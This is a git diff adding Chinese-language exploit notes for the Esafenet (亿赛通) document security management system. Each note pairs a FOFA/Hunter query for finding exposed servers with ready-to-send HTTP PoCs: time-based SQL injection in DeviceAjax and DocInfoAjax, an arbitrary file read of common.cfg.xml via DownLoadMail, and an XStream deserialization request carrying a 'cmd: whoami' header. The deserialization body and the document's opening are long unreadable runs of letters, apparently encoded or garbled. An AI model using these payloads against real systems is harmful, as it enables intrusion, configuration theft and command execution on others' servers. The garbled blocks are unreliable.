JHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706607036432-dff26af7-9068-4d30-a353-9fe1bedeae71.png](./img/T6HTQQEzJebP8SXq/1706607036432-dff26af7-9068-4d30-a353-9fe1bedeae71-784248.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cewauxybrlo14kzk>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..7af1465
--- /dev/null
+++ b/亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` DeviceAjax`接口的`SecureUsbid`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-DLP"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/js/../DeviceAjax HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=delSecureUsb&SecureUsbid=-1'waitfor delay '0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..8b76651
--- /dev/null
+++ b/亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` DocInfoAjax`接口的`logicpath`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-DLP"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/js/../DocInfoAjax HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=JudgeHasFile&logicpath==-1'waitfor delay '0:0:5'--
+```
+
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501122249109.png)
diff --git a/亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞.md
new file mode 100644
index 0000000..f3660a2
--- /dev/null
+++ b/亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞.md
@@ -0,0 +1,46 @@
+# 亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统DownLoadMail存在任意文件读取漏洞。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/qzeKmVZUxpzWRkIb/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-916900.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/esafenet/DownLoadMail HTTP/1.1
+Host: {hostname}
+Cookie: JSESSIONID=F0F476C5479EB3F01A61D1C7DF8ECB3F; JSESSIONID=0F2F97A8E40DE2E33C5922685B1BACEC
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 42
+
+path=/WEB-INF/classes/&name=common.cfg.xml
+```
+
+![1703415481453-1b65cdf4-c6b9-46de-8457-e35141f47277.png](./img/qzeKmVZUxpzWRkIb/1703415481453-1b65cdf4-c6b9-46de-8457-e35141f47277-481265.png)
+
+nuclei脚本
+
+[亿赛通电子文档安全管理系统-downloadmail-文件读取.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621691094-966b96fe-5f06-4dd5-b160-becec33698b9.yaml)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wdt0bxk0o0adw6zu>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统EmailAuditService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统EmailAuditService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..8b1ca9d
--- /dev/null
+++ b/亿赛通电子文档安全管理系统EmailAuditService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统EmailAuditService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统EmailAuditService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/8zi-BeBfAYPgtdrb/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-119926.png)
+
+# 四、漏洞复现
+```java
+POST /CDGServer3/EmailAuditService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: {hostname}
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAA